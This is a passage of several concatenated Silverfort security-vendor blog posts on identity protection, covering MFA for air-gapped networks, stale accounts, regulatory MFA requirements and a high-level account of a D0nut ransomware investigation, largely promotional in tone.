prevalent, enabling attackers to use leverage on-prem settings to breach the cloud. Knowledge matters: what is my environment’s identity threat exposure?   The report’s main role is to empower you to take action. How does your environment measure up against the average numbers? Do you have shadow admins, shared users, or heavy load NTLM authentication traffic? Are there service accounts that were inadvertently synced to your cloud IdP? And so on and so forth.   The Identity Underground Report won’t give you these answers – but it will point you to the right questions to ask to discover your true identity resilience. --- - Published: 2024-03-02 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/mfa-protection-for-air-gapped-networks/ The recent cyberattacks launched as part the Russia-Ukraine warfare have reawakened concerns about the security of air gapped networks, particularly regarding identity protection. Air gapping is implemented to reduce the attack surface of a highly sensitive network, such as the ones found in nations’ critical infrastructure, military and governmental environments, and manufacturing shop floors. These types of networks are likely to be targeted by threat actors, a likelihood that serves as an alternative expression of hostility while refraining from conventional warfare. In this article, we explore how the Silverfort Unified Identity Protection platform enforces secure authentication within air gapped environments by enabling the use of FIDO2 hardware tokens for MFA without agents, code modification, or authentication infrastructure changes. In this manner, Silverfort provides these networks real-time protection against lateral movement and automated malware propagation. What is an Air-Gapped Network? Air-gapped networks are computer networks with no interfaces connected to the outer world. This is obviously a drastic measure so the approach is typically only used by highly sensitive organizations that require maximum levels of security. Air-gapped networks are production environments where the machines comprising the environment have no outward-facing connection either directly to the Internet or indirectly to an outbound-facing internal network. Networks become air-gapped to reduce their attack surface and increases their resilience to cyberattacks. Some prominent examples of air-gapped networks include various national security actors such as defense, governments and military bodies, as well as critical infrastructure entities that provide energy, water utilities and other enabling services. Organizations of these types strive to segregate their most sensitive network segments entirely, so they are cut off from any internet connections. Air-Gapped Networks are Still Exposed to Malicious Infiltration While this approach makes sense in theory, in practice there are various constraints that make full air-gapping a nearly impossible task. What usually happens is that a certain degree of connectivity to the outside world is still maintained, regardless of all initial intentions, mostly due to operational reasons: operators who need to transfer external files into the network, software updates, remote technical support are a just a few common examples. At the end of the day all this adds up to an inherent inability to implement a true 100% air-gapped architecture. The Stuxnet malware, which was initially introduced into air-gapped networks using infected removable drives such as USB flash drives, should be a constant reminder that initial access to an air-gapped network remains possible. Lateral Movement in Air-Gapped Networks Once attackers have established an initial foothold in the air-gapped network, they can follow up with lateral movement, using stolen passwords and credentials to expand presence and increase the attack impact. In 2017, the infamous NotPetya attack performed such lateral movement in both standard IT networks as well as air-gapped OT networks. So, air gapping by itself cannot vouch for the ironclad protection its name implies. It might have been possible way in the past, but in today’s hyperconnected IT environment, it’s simply impractical. This calls for re-evaluation of how such networks should be best protected, both from initial malicious access, as well as from lateral movement in a post-compromise phase. What Restraints Make Air-Gapped Network Protection a Challenge? Air-gapped networks cannot be easily protected with standard security solutions. First and foremost, any solution that relies on cloud connectivity or internet connectivity cannot be used. Second, a main feature of air-gapped networks is their commitment to 24x7x365 operational stability. For example, this means that it's impossible to reboot them after a software install or patch is applied. In many cases, these networks also employ other proprietary systems that are under strict vendor warranty terms that don’t allow installation of 3rd party software on the servers. Also, you can often find legacy systems that are still active in these networks, even if manufacturer support no longer exists. This rules out any type of agent-based solution. And third, the nature of these networks increases their sensitivity for operational disruption caused by false positives or the breaking of critical processes while blocking malicious activity. All of these considerations significantly narrow the scope of optional security products that can be used in air-gapped networks. Requirements for Multi-factor Authentication in Air-Gapped Networks Overcoming the Built-In Security Restraints Multi-Factor Authentication (MFA) is the ultimate solution against attacks that utilize compromised credentials to access targeted resources such as account takeovers and lateral movement. However, to be effective in an air-gapped network, an MFA solution must meet several criteria, per the constraints we’ve described above: Is able to fully function without relying on internet connectivity Does not require the deployment of agents on the machines it protects Creates minimal disruptions and does not endanger the stability and availability of sensitive systems and processes   Hardware Token Support In addition, the common practice in air-gapped networks is to use physical hardware security tokens in place of the standard mobile devices that require internet connectivity. This consideration adds another requirement: Be able to utilize a hardware token to provide the second authentication factor. FIDO2 is the preferred standard for hard tokens and is considered resilient to both advanced and traditional phishing attacks. However, FIDO2 tokens can be used only with webauthN or U2F authentication protocols. If the systems within the air-gapped network weren’t designed initially to work with these protocols, it would be extremely difficult to perform the required alteration (see above on 24/7/365 availability). As a result, the last requirement is not easily satisfied, leaving many air-gapped networks exposed to attacks. Silverfort Secure Authentication for Air-Gapped Networks Our mission at Silverfort is to extend secure authentication to all users, access interfaces and resources. We have succeeded in applying MFA protection to resources that could have never been protected in this manner before, such as IT infrastructure, file shares, databases, IIOT, and even OT systems like HMIs and production servers. Aligning with this vision, Silverfort also provides agentless MFA protection for air-gapped networks, enabling the use of FIDO2 hardware tokens without any code changes on the protected systems: A Dedicated  Deployment Mode Agnostic to Internet Connectivity: Silverfort offers a full on-prem deployment mode. In this mode, Silverfort is deployed as a Virtual Appliance on-premises, with full functionalities available.  Note that Silverfort also offers a SaaS-based deployment option and a hybrid on-premise-SaaS deployment option. Agentless Architecture with No Code Changes Required: Silverfort’s unique innovative architecture allows organizations to extend Multi-Factor Authentication to any system or resource, without installation of agents on the protected machines, and without requiring any code customization or any alteration of the authentication protocols. FIDO2 Compliant Hardware Tokens: Silverfort enables organizations to choose their authenticator in the air-gapped environments, including all FIDO2 hardware tokens. The most popular implementation within our customers’ ecosystem is our integration with YubiKey tokens. This seamless integration bridges the gap between the modern FIDO2 tokens and your existing authentication infrastructure to provide comprehensive MFA protection to the air-gapped network. Conclusion Air-gapping is a sound security strategy —but one must acknowledge both its gaps and implications on the security products you can use. Silverfort’s MFA enables you to enforce secure authentication and validate the identity of users in air-gapped networks, ensuring they are protected against identity-based attacks. --- - Published: 2024-02-21 - Modified: 2025-07-21 - URL: https://www.silverfort.com/blog/identity-risks-of-stale-user-accounts/ One of the biggest security weaknesses organizations face is their own employees. This isn't pleasant, but it is a reality we must accept. When they make mistakes, they open the door to attackers. This is even more true when dealing with the user accounts of previous employees. It's a common misconception that the primary risk associated with former employees' accounts lies in the potential for disgruntled ex-workers to use their credentials maliciously. Even though insider threats pose a significant risk, there is another danger that often goes unnoticed: external attackers compromising unmonitored accounts. In many cases, these accounts become forgotten relics of past employment, left unchecked and unmonitored as employees move on to new opportunities. It is precisely this neglect that makes them such attractive targets for cybercriminals. Common Challenges and Risks of Ex-Employee Accounts Attackers are aware that these inactive accounts or stale user accounts, commonly known as 'leavers', are often overlooked by organizational security measures. Most IT teams will remove these account privileges and access to critical resources, but this is not always the case. Even though we would never want to imagine that our employees are capable of malicious actions, failure to revoke a leaver's access can leave the door open for sensitive company information to be misused and leaked. It is also important to note that lingering accounts pose a risk in terms of password usage. If an active leaver's account uses a duplicate or insecure password, third parties may have easy access to your organization. Since the former employee may still possess high privilege access and permissions due to their tenure, attackers have an attractive target to help them gain a foothold in an environment. Whether it is accessing sensitive data, infiltrating critical systems, or initiating lateral movement within the network, compromising these overlooked accounts has the potential to cause significant damage. The most common example would be the case of a super admin who is let go. Their user account has access to most critical resources, yet IT does not disconnect the account or remove its privileged access. Real-Life Example: Threat Actors Leveraged Ex-Employee Accounts to Breach State Government Systems According to the Cybersecurity and Infrastructure Security Agency (CISA), a threat actor gained access to a US government organization's network using a former employee's administrative login credentials. By using compromised credentials, the attackers were able to access an internal VPN and the on-prem environment and execute LDAP queries on a domain controller. The organization, which CISA has not named, failed to remove the former employee's account, which allowed the threat actor to analyze the environment and its resources. The credentials allowed access to two virtualized servers, SharePoint and the employee's workstation. A second employee's credentials were extracted from the SharePoint server and used to authenticate to the on-prem Active Directory and Entra ID (Azure AD), thereby gaining administrative access. Both virtualized servers have been taken offline and the user account has been disabled. In addition to changing the credentials for the second compromised account, the victim organization also removed its administrative privileges. Additionally, CISA noted that neither of the administrative accounts had MFA enabled. As this example illustrates, even following best practices throughout your IT security strategy is not sufficient when dealing with attackers. Instead of assuming you have done enough to secure the accounts of former employees, it is best to add more concrete identity security controls that deny access as a means of ensuring the safety of these accounts. How Silverfort Secures Former Employee Accounts Silverfort enables Identity teams to easily discover former employee accounts in their environments and either delete them or remove their permissions. Silverfort classifies accounts that have not been used for a year or more as “stale users”. With Silverfort you can gain complete and continuous visibility into stale users and apply appropriate security measures, such as enforcing block access policies to these user accounts. Let’s see exactly how this is done in Silverfort’s console: Visibility Into Stale Users Silverfort automatically discovers all accounts in your environment, including stale user accounts, and provides real-time visibility into all user activity. This enables you to detect and respond to potential security threats — including blocking the access of any accounts that display anomalous behavior. In Silverfort's Insights screen, you will see an in-depth identity inventory that displays the types of users and resources in your environment as well as weaknesses in your security. Under Users & Passwords, you can find the entire list of stale users in your environment. Silverfort detects and categorizes these accounts by common attributes of stale user accounts. Screenshot #1: Discovering the number of stale users in the Insights screen Clicking on the Stale Users space opens a window that shows you full details on these accounts. Now that you have the names of these stale users, you can locate them in its IdP and either remove their permissions, delete them altogether, or apply a deny access policy to the user account. Screenshot #2: Displaying the complete list of stale users The Power of Deny To take a more proactive approach to preventing ex-employee user accounts from creating any more security risks, it’s recommended that you create a ‘Leavers’ deny access policy. This will ensure that if a malicious actor comprises a stale account to gain access to anything in your environment, they will be automatically denied access. Screenshot #3: Deny access policy to prevent stale user access In Silverfort’s Policies screen, create a new policy. Check your IdP as the Auth Type, then check either Kerberos/NTLM or LDAP, depending on your needs. Choose Static Based for the policy type and for User and Group, it should be assigned to the Leavers group or a similar name you have for employees who are leaving or have left. Next, under Action, choose Deny. Once enabled, this policy will automatically deny access to any account to whom this policy is assigned. If this account was compromised, this policy would deprive an adversary of the ability to use it for malicious access. Real-Time Visibility and Protection are Critical to Mitigating the Risks of Former Employee Accounts Many types of security threats can endanger your organization in today's hybrid environment, so comprehensive security requires complete visibility, monitoring, and protection. The visibility of stale users and the blocking of any access requests are important for ensuring attackers will not use these accounts to gain access to other parts of the environment. By applying continuous monitoring and active policy enforcement to every form of employee accounts, Silverfort can both automate the discovery of stale users as well as deliver real-time protection against their abuse. Looking to solve identity protection challenges in your environment? Reach out to one of our experts here. --- - Published: 2024-02-06 - Modified: 2024-07-10 - URL: https://www.silverfort.com/blog/identity-protection-action-items-following-midnight-blizzard-attack/ In light of the Midnight Blizzard’s attack, it’s evident that our cybersecurity strategies must evolve to keep pace with the sophisticated tactics employed by nation-state actors. This particular breach, initiated through a password spray attack on a legacy, non-production test tenant, underscores several critical areas for immediate action and reflection within our cybersecurity practices: Enhanced Focus on Multi-factor Authentication (MFA) While Microsoft now enforces MFA by default to bolster security, this incident accentuates the need for organizations to meticulously review all existing tenants, including older ones, to ensure they are also protected by MFA. It’s a stark reminder that legacy systems and configurations can provide inadvertent backdoors to attackers, making it imperative that we extend modern security measures retrospectively across all digital assets. Test Tenant Overprivileges A critical lapse identified in the attack was the excessive permissions granted to a test tenant, which inadvertently allowed access to Microsoft’s corporate environment. This incident emphasizes the necessity of stringent monitoring and restriction of permissions for OAuth apps and other integrations within both production and non-production environments. Ensuring that test tenants adhere to the principle of least privilege and are segregated from production systems is vital in minimizing the risk of such breaches. The Deceptive Nature of Phishing Seeing that business email of such security aware companies can be compromised, reminds us all to not view the email address as proof for the authenticity of an email. Even if you receive legitimately looking email from companies you trust, remember that it’s always possible that they’ve been hacked. So avoid entering your credentials when clicking on email links. Also be careful opening files received by email. Instead – use your browser to sign in by typing in the address yourself - if you use Single Sign On it shouldn’t be too much of a hassle. If you need to receive files by email, verify it with the sender before opening, or open the files in a sandbox. To learn more about how Silverfort takes identity protection where it has never gone before, request a demo. --- - Published: 2024-01-23 - Modified: 2024-09-16 - URL: https://www.silverfort.com/blog/silverfort-raises-116m-to-lead-identity-security-market/ What a year... Despite the economic and geo-political challenges we’ve been experiencing over the last months, Silverfort has grown at a tremendous pace. In 2023, as in the three years prior, we grew our annual recurring revenues (ARR) more than 100% year-over-year, adding tens of millions in new ARR. Much of this success is thanks to our amazing channel partners, who are the heart of our growth strategy. Some of the world’s largest enterprises now trust Silverfort to protect their corporate identities, including multiple Fortune 25 companies, with more than 100 new customers joining us each quarter. I am incredibly thankful to our customers for partnering with us and helping us build this company and product. To meet this significant demand, our team also grew by 60% in 2023 to nearly 300 employees across the globe, all dedicated to delivering the best product and experience for our customers. Today, we announce $116M in new financing from Brighton Park Capital (BPC), alongside many of our existing investors, bringing our total funding to $222M. The BPC team has been great to work with throughout the fundraising process. They have an impressive level of understanding of our market and they share our vision for it. They also bring a lot of experience that will help us as we build a large company and reshape the way identity protection is done in every organization. Before I say anything else, I want to thank our team for making this success and this milestone possible. When we founded this company, I hoped to build a culture where people work together in true teamwork, and where ideas, creativity, and inclusivity thrive. Silverfort was recently recognized as the best startup company to work for in Israel for the second year in a row, and I couldn’t be prouder. This team’s hard work, customer-focus, and commitment to solving challenging problems is why we are seeing these great results and why I am so excited about where we will take this company and product next. Thank you for joining me in building this. Why Identity When Yaron, Matan, and I started this company, our goal was to solve a very difficult and rapidly growing problem that many organizations face. Compromised identities are now the weapon of choice for attackers, making identity the most vulnerable element of the enterprise attack surface. Attackers are taking advantage of the blind spots that exist in almost every organization’s IAM infrastructure, which couldn’t previously be protected. This can be partially attributed to a market misperception that IAM providers, who manage identities, are also responsible for securing them, while in fact they are not able to for two major reasons: The migration of many enterprises to hybrid and multi-cloud environments created a fragmented, complex IAM infrastructure: 92% of companies are now using a combination of cloud-native and on-prem identity solutions, often from multiple competing vendors. Each identity solution operates as a “silo” with its own local security controls, without understanding the broader context of a user's activity and without any consistent enforcement measures that work across the distributed identity environments. IAM and point identity security solutions are unable to protect many critical resources, including those attackers frequently target in data breaches – such as command-line interfaces, legacy systems, service accounts (non-human identities), file shares, databases, and IT/OT infrastructure. These resources allow attackers to avoid the existing identity security controls, making these controls ineffective. Unifying Identity Protection with a Single Platform Our goal is to develop a platform that unifies identity protection with a single layer that operates on top of all the distributed “silos” of the enterprise identity infrastructure. Our Unified Identity Protection platform extends modern security measures to every identity in the organization, regardless of whether it’s a human or a machine, on-prem or in the cloud, or anything in between. We pioneered a unique architecture that extends identity protection to previously “unprotectable” resources. Imagine enabling security controls like MFA or Zero Trust access policies to legacy systems, service accounts, command-line tools, IT/OT infrastructure and more – it’s now not only possible, but also easy. Working closely with our customers and partners, we purposely designed our platform to be extremely quick and simple to deploy and use, without the need to modify all these countless systems that we are protecting. There’s no need to install or configure anything on them or to deploy proxies in front of them. This means we can make identity security available everywhere and effectively stop identity threats like account takeover, lateral movement, and ransomware propagation. If you want to learn more, see a demo. Leading the Identity Security Market Looking ahead, we plan to invest heavily in expanding our platform, both by broadening the capabilities of our existing product modules and by developing several new innovative modules to offer the most complete, end-to-end identity protection solution in the market. I am very excited to welcome Mike Gregoire, Co-Founder and Partner at Brighton Park Capital, to the Silverfort Board of Directors. Mike was previously the CEO of CA Technologies and Taleo, and his experience will help us tremendously as we scale our company to meet customers’ needs and position Silverfort as the leader of the rapidly growing identity security market. I am very excited to partner with Mike and the great team at BPC. We're hiring – so if you want to help transform how businesses secure their identities, come join us! --- - Published: 2024-01-17 - Modified: 2024-07-10 - URL: https://www.silverfort.com/blog/identity-segmentation-key-in-bolstering-security-posture/ As cyber threats evolve, organizations must constantly adapt their identity security strategies to stay protected. One of the most significant elements of modern security strategies is network segmentation, which involves the division of a network into smaller, isolated segments to limit unauthorized access to sensitive resources. As network segmentation is well-known and implemented by most organizations, the rise of identity threats presents a more modern approach to segmentation from the identity control plane. A further extension of this concept is identity segmentation, which focuses on the identity and attributes of the users, devices, and applications. This approach enables organizations to apply granular access controls to specific identities, improving their overall security posture and protection against unauthorized access. In this blog, we will explore the difference between network segmentation and identity segmentation. We will also explore how identity segmentation is the key to implementing a true Zero Trust strategy. The Evolution of Network Segmentation Network segmentation is a security approach that isolates segments in the enterprise network to reduce the attack surface. Network segmentation works best in the "castle and moat" enterprise environment, securing all exposure points in the environment. This approach has been heavily implemented since the early 2000s by security and IT teams. While this approach has proven effective in most network security strategies, the evolving nature of cyber threats highlights gaps in network segmentation. Network segmentation access policies are typically defined by firewall rules or VLANs, which tend to be static and dependent on network traffic. These static policies are dependent on the device and not the user's access requirements, often granting broad access to users based on their location within the network. Attackers increasingly target user identities, exploiting compromised credentials to gain unauthorized access. The approach does not adapt to the dynamic nature of modern work environments, where users access resources from a variety of devices and locations. Network segmentation fails to provide the granular control required to secure identities effectively. Identity Segmentation Boosts Identity Security Posture Identity segmentation is the approach to security that involves managing and controlling access based on user identities, roles, and attributes. Instead of relying on rigid network boundaries such as IP access lists and firewall rules, identity segmentation divides the network not just from a physical or geographical standpoint, but also from the perspective of the identity control plane. This is done by segmenting an environment based on the identity and attributes of users, devices, and applications. By doing so, organizations can implement granular access controls, ensuring users only have access to the resources necessary for their roles. Network Segmentation vs Identity Segmentation Network segmentation involves dividing a network into different segments to enhance security and control. Traditional network segmentation relies on factors like IP addresses, VLANs, and physical separation to create these segments. While effective at limiting the impact of a breach within the network, network segmentation often falls short in addressing the dynamic and evolving nature of user identities. On the other hand, identity segmentation shifts the focus to user identities. This approach aligns with modern security threats where users are the primary targets and threats often exploit compromised credentials. Identity segmentation involves creating access controls based on user attributes, roles, and behavior, so users can only access the resources necessary for their roles, irrespective of their network location. The primary difference lies in their focus: network segmentation emphasizes securing pathways and infrastructure, while identity segmentation centers on safeguarding individual user identities. Network segmentation tends to rely on static policies based on network structure, whereas identity segmentation involves dynamic and context-aware access controls based on user attributes. Identity segmentation is particularly effective in countering identity-based threats, which have become increasingly prevalent in the cybersecurity landscape. Adapting to the Zero Trust Architecture To implement a Zero Trust architecture, all organizations must protect their identities, devices, networks, applications, and workloads, as well as data. It is important to note that while many organizations have successfully implemented a few principles of the Zero Trust model, most still need to strengthen their identity security posture management. Strong identity management and protection enables organizations to respond more rapidly and precisely when a potential threat arises. IT teams can better track and alert on any identity threats that come up, prompting proactive measures to stop potential unauthorized access attempts. To construct a complete Zero Trust architecture across your environments, identity management and identity protection must be the core components. This will enable you to manage and protect all aspects of identity effectively, which is essential for safeguarding all types of assets, including those that are on-prem. --- - Published: 2024-01-10 - Modified: 2025-05-19 - URL: https://www.silverfort.com/blog/healthcare-identity-threats-why-almost-20-of-breaches-lead-to-injury/ The healthcare industry faces significant threats from data breaches and compromised medical devices, resulting not only in high financial losses but also endangering patients' health. In a survey of US healthcare experts conducted in 2022, 53% reported an increase in mortality rates due to ransomware attacks. In 2021, 30% of cyberattacks targeting healthcare organizations caused disruptions to emergency services. Another 17% led to severe harm to patients. A recent victim of such a breach was Ardent Health Services. On Thanksgiving Day 2023, a major ransomware attack affected its 30 hospitals and over 200 other healthcare facilities across six US states. In several cases, ambulances transporting emergency room patients were diverted to other hospitals. MFA Does not Cover Medical Devices Even though medical devices have a lifetime of up to 30 years, their software and security practices might never be updated. The FBI has identified a growing number of security flaws in such medical devices (referred to as legacy devices), including insulin pumps, defibrillators, and pacemakers. As legacy devices do not support multi-factor authentication (MFA), malicious actors may use compromised credentials to manipulate device readings, administer drug overdoses, or commit other crimes. Service Accounts are Rarely Listed and Documented Only 10% of healthcare organizations have complete visibility into their service accounts. It is already difficult to manage service accounts, but healthcare organizations face an even greater challenge as they use a wide range of different devices and systems. Often, there may be hundreds of unknown service accounts associated with medical devices or health systems, including the Master Patient Index (MPI), Electronic Health/Medical Records (EHR/EMR), billing, and electronic prescriptions. Silverfort's Unified Identity Protection for Healthcare Silverfort's unified identity protection platform automatically detects service accounts and creates access policies based on their behavior. In the event that an access attempt differs from the policy, it will be blocked. Silverfort can also enforce MFA on legacy systems without interfering with their day-to-day operations, preventing malicious authentications for all users, admins, and service accounts across any system, resource, and protocol. For more information, download our full eBook or request a demo. --- - Published: 2024-01-03 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/the-clock-is-ticking-on-ny-dfs-mfa-requirements/ On March 1, 2017, the Department of Financial Services enacted a regulation establishing cybersecurity requirements for financial services companies, 23 NYCRR Part 500 (referred to below as “Part 500” or “the Cybersecurity Regulation”). As a result of investigating hundreds of cybersecurity incidents, Part 500 was amended, increasing the amount and type of security measures organizations are expected to implement to gain sound cyber resilience. This amendment became effective on November 1, 2023. What Are the Identity Protection Requirements in the New Amendment? Section 500. 12 of the amended part 500 states MFA is required in the following: Remote access to the covered entity’s information systems; Remote access to third-party applications, including but not limited to cloud-based apps from which nonpublic information is accessible; and All privileged accounts other than service accounts that prohibit interactive login. Failure To Meet These Requirements Results in Large Fines The DFS issued this notification on November 23rd, 2023: ‘The New York State Department of Financial Services (DFS) today announced that First American Title Insurance Company (First American) will pay a $1 million penalty to New York State for violations of DFS’s Cybersecurity Regulation (23 NYCRR Part 500) stemming from a large-scale cybersecurity breach in May 2019. The breach contributed to the exposure of consumers’ nonpublic information. In addition to penalties, the company has agreed to implement significant remedial measures to better secure consumer data. ’ There’s no reason to assume that failing to comply with the new amendment will have different results. For that reason alone, it should serve as an incentive to all organizations to fully adjust their defenses to the amended requirements. The Identity Protection Implication: Ransomware Spread and Lateral Movement Privileged accounts are the leading attack surface abused by ransomware actors. Every high-scale ransomware attack seeks to plant a malicious payload in as many machines as possible. The way to achieve that is by compromising the credentials of a privileged account and using it to log in to as many machines as possible. In that sense, the amendment is spot on: placing MFA on all privileged accounts significantly reduces the likelihood of such an attack – as long as it actually covers all of them. Not All MFA Solutions Are Born Equal: Checkbox Mindset Can Get You Pwned The coverage of your chosen MFA solution is critical. Let’s assume you purchase an MFA solution, deploy it based on the MFA vendor’s recommendations, and leave a portion of admin access uncovered. Let’s also assume that this portion will be abused during a cyberattack, exposing the confidential data you’re entrusted with. In that case you’ll probably be found liable, and the fact that the other portion of administrative access was secured will not change a thing. 360 Admin Access Coverage: Command-Line Access, Legacy Apps, and IT Infrastructure You need an MFA solution that can ensure all admin access is protected. There are MFA solutions that struggle with anything beyond web/SaaS, VPN, or RDP. When choosing your solution, make sure it can cover the access methods commonly abused by adversaries. Prominent examples include: Command-line access Command-line access tools such as PsExec and Remote PowerShell are the prime vector adversaries use to gradually spread in a compromised environment. File shares Adversaries abuse file shares to simultaneously plant and execute malicious payloads in multiple machines – a far more efficient method than accessing each machine individually. Legacy apps Many organizations run core operation processes on legacy applications, making them a lucrative target for ransomware actors. IT infrastructure Adversaries strive to gain access to the management interface of an IT or security solution in your environment, as it would give them unlimited access to your resources. All these examples introduce a significant challenge to most MFA solutions in the market and in many cases are not covered at all. To comply with the amended NY-DFS MFA requirements, you should ensure they are covered and protected. Learn how Silverfort MFA enables you to meet NY-DFS requirements. --- - Published: 2023-12-20 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/navigating-essential-8-changes-with-mfa-protection-and-privileged-account-security/ In the ever-evolving landscape of cybersecurity, staying ahead of the game is not just an advantage – it's a necessity. As of November 2023, the Essential Eight Maturity Model has undergone significant changes, underscoring the critical importance of Multi-Factor Authentication (MFA), securing privileged accounts, and extending MFA to workstations in fortifying your organization against cyber threats. The Australian Cyber Security Centre (ACSC) has outlined these changes in detail, providing a roadmap for businesses and government entities to enhance their cybersecurity postures. The Essence of MFA MFA has emerged as a critical component in safeguarding digital identities. The Essential Eight changes accentuate MFA's pivotal role in preventing unauthorized access to systems and data. With the increasing sophistication of cyber threats, relying solely on passwords is equivalent to leaving the front door of your digital fortress wide open. Silverfort, a leading innovator in adaptive risk-based authentication, is uniquely positioned to address the heightened emphasis on MFA. Silverfort's solution goes beyond conventional MFA protection by seamlessly integrating into your existing infrastructure. It utilizes adaptive authentication to dynamically assess risk and prompt additional verification when anomalies are detected. This ensures that even if credentials are compromised, unauthorized access is thwarted, aligning perfectly with the new Essential Eight guidelines. MFA to Workstations with FIDO2 Integration and Desktop Messaging One of the notable changes in the Essential Eight framework is the emphasis on extending MFA to workstations. Silverfort takes this requirement to the next level with its FIDO2 integration. This is an open authentication standard that enables passwordless authentication and reduces the risk of phishing attacks. Silverfort's FIDO2 integration seamlessly incorporates passwordless authentication for workstations. Employees can use biometric or cryptographic methods, eliminating the reliance on traditional passwords. What sets Silverfort apart is its additional feature, the Desktop Messaging Service. This service ensures a streamlined user experience by delivering real-time authentication requests directly to users' desktops. This means that users can conveniently authenticate without having to switch between applications or devices, enhancing both security and user convenience. Safeguarding Privileged Accounts with MFA and Service Account protection Privileged accounts are the crown jewels of any organization, holding the keys to the kingdom. The Essential Eight changes highlight the urgency of protecting these accounts from exploitation, emphasizing the need for robust controls and monitoring. This is where Silverfort's Unified Identity Protection Platform shines, offering a comprehensive solution that goes beyond the traditional boundaries. The Essential Eight changes introduce additional requirements focused on the hardening of administrative infrastructure used by privileged users. Silverfort's Unified Identity Protection Platform not only addresses these requirements through MFA protection but also extends its capabilities to include robust Service Account Protection. Service Account Protection is a critical aspect of Silverfort's solution, ensuring privileged service accounts are secured against compromise. By enforcing the principle of least privilege, and continuous monitoring of service accounts, Silverfort's Unified Identity Protection Platform extends beyond traditional security measures. This comprehensive approach minimizes the risk associated with privileged accounts, aligning perfectly with the new Essential Eight guidelines. Why Silverfort? With the Essential Eight changes placing a spotlight on MFA, unified identity protection, and extending MFA to workstations, Silverfort stands out as the go-to solution. Its adaptive authentication approach, robust Unified Identity Protection Platform, seamless FIDO2 integration, and innovative Desktop Messaging Service align seamlessly with the new guidelines, offering a comprehensive and proactive defense against evolving cyber threats. In a digital landscape where threats are ever-present and regulations are continually evolving, Silverfort provides the security and peace of mind organizations need. Don't just meet the Essential Eight standards – exceed them with Silverfort, fortifying your organization against the dynamic challenges of the modern cybersecurity landscape. --- - Published: 2023-12-15 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/finding-the-sweet-spot-how-donut-extortion-group-targets-achilles-heel-in-cybersecurity/ Every organization faces an ongoing battle against cybersecurity threats. Attackers are constantly looking for vulnerabilities to exploit, seeking out the Achilles’ heel that can give them access to your systems and data. In this blog post, we'll explore a real-world use case where a cybersecurity extortion group successfully found and exploited our customer's Achilles’ heels. We'll take a closer look at the attack and our investigation and provide recommendations to help you protect your organization from similar threats. Achilles’ Heel in Cybersecurity Cybersecurity is an ongoing battle between attackers and network administrators. Attackers are constantly searching for the Achilles’ heel, looking for unpatched networks, unpatched servers, outdated operating systems, users without multi-factor authentication, etc. Network administrators require ongoing attention to identify and remediate all these security gaps.   Investigation Following the D0nut’s Crumbs  In this use case, a customer was the target of a ransomware attack by the D0nut extortion group. The group sent an email informing the customer about the attack and claiming to have exfiltrated data and encrypted servers. This group has been known to deploy ransomware in double extortion attacks on enterprises.   Double extortion ransomware is a type of cyberattack in which threat actors exfiltrate a victim's sensitive data in addition to encrypting it, giving the criminal additional leverage to collect ransom payments. A typical ransomware attack will only encrypt a victim's data.   Before contacting us, the customer started an investigation and revealed multiple suspected compromised machines, user accounts and encrypted servers. So we had suspected compromised machines and users to begin the investigation with an estimated timeframe. Then we started looking into the recent behavior of those users and machines. To make it easier to follow, let's add some names first:  Compromised machines: Machine1, Machine2, Machine3  Compromised users: USER_A, SVC_USER1, SVC_USER2 (initially, only SVC_USER1 was known by the customer to be compromised)  Encrypted servers: Server1, Server2, Server3  At the beginning of the investigation, we noticed that Machine1 stood out, with an authentication spike that included 1,500 destinations in a short time window. All the authentications were by three users, USER_A, SVC_USER1 and SVC_USER2. Since two of the three users weren’t on the customer’s suspected users list, we immediately notified them and recommended they block their access. This led the customer’s IR team to find that USER_A had downloaded a malicious file to Machine1, making it the attacker’s official starting point. Another crumb helping the investigation was that Machine1 is one of a Virtual Desktop Infrastructure (VDI) machines group, which are internet-facing machines. This makes them more exposed to remote cybersecurity attacks. Looking at authentications to all the VDIs, we found attempts blocked by MFA to all the VDI machines except for Machine1.  Why? Because Machine1 was the only one not protected by Silverfort’s MFA policy. As a result of human error, the customer missed Machine1 in the protection policy, making it their Achilles’ heel for threat actors to find.   Consequently, the attacker stole SVC_USER1 and SVC_USER2 credentials from the Machine1 machine and used them to move laterally and compromise two additional machines: Machine2 and Machine3. With our domain authentications visibility, we could see all the abnormal authentications to and from Machine1, Machine2 and Machine3, including authentications to the encrypted servers Server1, Server2 and Server3 on the day before the email was sent.   Combining all the findings, we were able to build a more comprehensive picture of the attack surface to follow D0nut’s actions.    How D0nut group gained access to Machine1, which wasn’t protected by MFA, and moved laterally across the environment. Additional Security Gaps Exploited Threat actors often search for loopholes to exploit when looking for a remote way into a network. The D0nut extortion group found multiple loopholes in their attack campaign. First, they gained access to the organization's network through an unprotected internet-facing machine. Second, the attacker needed a user account to steal, so they targeted a contractor's account, USER_A. Contractors are typically less monitored and protected than regular employees and do not fall under most protection conventions, making them more vulnerable to compromise. Moreover, USER_A was a shadow admin used excessively in the attack, further exploiting a security gap that enabled the attacker to stay hidden. As a result, the attacker successfully stole the credentials of SVC_USER1 and SVC_USER2, both service accounts that allowed the attacker to move laterally and compromise more machines.   Service accounts and shadow admins, while different from each other, share a common vulnerability: they are highly privileged user accounts that are difficult to monitor and protect. As a result, they are attractive targets for attackers seeking access to critical systems and data. Despite the risks, the customer in this use case had not implemented any protection for these accounts. This oversight allowed the attackers to leverage both types of accounts to move laterally within the network, furthering their attack and increasing the damage they could cause. With Silverfort's comprehensive visibility, this breach could have been prevented, and the customer's systems and data could have remained secure.   All these security gaps are common Achilles’ heels for organizations, so we highly recommend implementing protection on them.   Silverfort Recommendations – Anyone Can Have a D0nut This showcases just one extortion group looking for an Achilles’ heel in your network – but unfortunately, there are many more. Arm up and protect your organization by implementing Silverfort’s recommendations.   1. Protecting Internet-Facing Machines with MFA With Silverfort’s MFA policy, you can protect internet-facing machines and servers from malicious connections. One unprotected machine is all it takes for the attacker to get in, as they found the one missing from the protection group due to a human error. In this customer’s use case, we saw how Silverfort was able to block the attacker’s attempts to compromise protected internet-facing machines.   2. Using Your SIEM to Monitor Denied MFAs  Silverfort allows the implementation of multi-factor authentication (MFA) on domain identities, enabling you to have protection and visibility for these identities. You can send the logs Silverfort produces to your SIEM (Security Information and Event Management), which enables another layer of protection. In this use case, if denied MFA was monitored, the customer would have been able to notice the attempted attack on all VDIs and catch it sooner.   3. Protecting Service Accounts  Silverfort automatically discovers service accounts, learns their behavior, and recommends smart 